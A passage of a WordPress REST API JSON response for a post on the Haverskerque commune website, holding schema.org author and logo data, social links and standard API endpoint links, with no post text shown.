d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/602","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=602"}],"version-history":[{"count":5,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/602\/revisions"}],"predecessor-version":[{"id":8296,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/602\/revisions\/8296"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/568"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=602"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=602"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=602"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}